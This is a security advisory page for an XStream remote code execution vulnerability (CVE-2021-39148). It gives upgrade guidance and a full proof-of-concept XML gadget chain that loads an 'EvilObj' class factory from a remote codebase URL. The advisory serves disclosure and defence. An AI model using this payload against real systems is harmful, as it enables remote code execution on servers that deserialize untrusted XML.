Arbitrary Code Execution Affecting com.thoughtworks.xstream:xstream package, versions [,1.4.18)
Threat Intelligence
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569181
- published 24 Aug 2021
- disclosed 24 Aug 2021
- credit wh1t3p1g
Introduced: 24 Aug 2021
CVE-2021-39148 Open this link in a new tabHow to fix?
Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.
Overview
com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.
Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.
PoC
<sorted-set>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>ysomap</type>
<value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
<message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
<parsedMessage>true</parsedMessage>
<soapVersion>SOAP_11</soapVersion>
<bodyParts/>
<sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
<attachmentsInitialized>false</attachmentsInitialized>
<multiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'>
<soapPart/>
<mm>
<it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
<aliases class='com.sun.jndi.toolkit.dir.ContextEnumerator'>
<children class='javax.naming.directory.BasicAttribute$ValuesEnumImpl'>
<list class='com.sun.xml.internal.dtdparser.SimpleHashtable'>
<current>
<hash>1</hash>
<key class='javax.naming.Binding'>
<name>ysomap</name>
<isRel>false</isRel>
<boundObj class='com.sun.jndi.ldap.LdapReferralContext'>
<refCtx class='javax.naming.spi.ContinuationDirContext'>
<cpe>
<stackTrace/>
<suppressedExceptions class='java.util.Collections$UnmodifiableRandomAccessList' resolves-to='java.util.Collections$UnmodifiableList'>
<c class='list'/>
<list reference='../c'/>
</suppressedExceptions>
<resolvedObj class='javax.naming.Reference'>
<className>EvilObj</className>
<addrs/>
<classFactory>EvilObj</classFactory>
<classFactoryLocation>http://127.0.0.1:1099/</classFactoryLocation>
</resolvedObj>
<altName class='javax.naming.CompoundName' serialization='custom'>
<javax.naming.CompoundName>
<properties/>
<int>1</int>
<string>ysomap</string>
</javax.naming.CompoundName>
</altName>
</cpe>
</refCtx>
<skipThisReferral>false</skipThisReferral>
<hopCount>0</hopCount>
</boundObj>
</key>
</current>
<currentBucket>0</currentBucket>
<count>0</count>
<threshold>0</threshold>
</list>
</children>
<currentReturned>true</currentReturned>
<currentChildExpanded>false</currentChildExpanded>
<rootProcessed>true</rootProcessed>
<scope>2</scope>
</aliases>
</it>
</mm>
</multiPart>
</sm>
</message>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>ysomap</type>
<value class='com.sun.org.apache.xpath.internal.objects.XString'>
<m__obj class='string'>test</m__obj>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
</sorted-set>
XStream xstream = new XStream();
xstream.fromXML(xml);